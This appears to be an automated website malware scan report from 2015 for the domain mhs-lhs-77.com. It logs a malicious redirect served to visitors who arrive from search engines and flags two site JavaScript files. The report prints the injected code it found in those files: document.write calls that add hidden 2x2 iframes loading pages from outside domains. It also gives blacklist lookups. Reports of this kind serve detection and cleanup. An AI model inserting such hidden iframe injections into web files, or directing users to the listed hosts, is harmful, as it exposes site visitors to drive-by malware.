Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://mhs-lhs-77.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: mhs-lhs-77.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 08 Jun 2015 00:39:58 GMT Location: http://eosusa.com/cewf.html?h=1344450 Server: Apache/2.4.7 (Unix) OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 221 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://mhs-lhs-77.com/ | 200 OK Content-Length: 2475 Content-Type: text/html | clean |
http://musecdn.businesscatalyst.com/scripts/1.1/jquery-1.7.min.js | 200 OK Content-Length: 33231 Content-Type: application/x-javascript | clean |
http://mhs-lhs-77.com/scripts/1.1/sprydomutils.js?222635312 | 200 OK Content-Length: 14873 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450></iframe>'); (function(){if(typeof Spry=="undefined")window.Spry={};if(!Spry.Utils)Spry.Utils={};Spry.$=function(a){if(arguments.length>1){for(v c[a]=b;a=c}this.forEach(function(b){for(var c in a)try{b[c]=a[c]}catch(f){}})}return this}})(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://dentazone.com/ozei.html?j=1344450 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450> Hidden iFrame found. size: 2x2 src: http://thecardoctorsales.co.uk/aeef.html?j=1344450 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450> | ||
http://mhs-lhs-77.com/scripts/1.1/museutils.js?4051851185 | 200 OK Content-Length: 13266 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450></iframe>'); if(typeof Muse=="undefined")window.Muse={};Muse.Assert={};Muse.Assert.fail=function(a){alert("MuseJSAssert: "+a)};$.extend($.browser,{ Muse.Utils.refreshIframesAndObjectsToPauseMedia=function(a){a.filter(function(){return $(this).css("display")!="none"}).each(function(){$("iframe, object",this).each(function(){var a=$(this).next();a.length==0?(a=$(this).parent(),$(this).detach().appendTo(a)):$(this).detach().insertBefore(a)});$("video",this).each(function(){$(this).get(0).pause&&$(this).get(0).pause()})})}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://dentazone.com/ozei.html?j=1344450 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://dentazone.com/ozei.html?j=1344450> Hidden iFrame found. size: 2x2 src: http://thecardoctorsales.co.uk/aeef.html?j=1344450 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thecardoctorsales.co.uk/aeef.html?j=1344450> | ||
http://mhs-lhs-77.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mhs-lhs-77.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mhs-lhs-77.com/
Result: mhs-lhs-77.com is not infected or malware details are not published yet.
Result: mhs-lhs-77.com is not infected or malware details are not published yet.